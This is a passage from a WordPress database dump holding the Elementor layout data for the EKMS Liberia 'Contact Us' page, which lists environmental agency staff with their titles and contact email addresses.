href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14925,2370,'_elementor_edit_mode','builder'),(14926,2370,'_elementor_template_type','wp-page'),(14927,2370,'_elementor_version','2.7.5'),(14928,2370,'_wp_page_template','default'),(14929,2370,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br \\/>Send an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a>,\\u00a0fill out the contact form below or contact the EKMS knowledge brokers directly:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\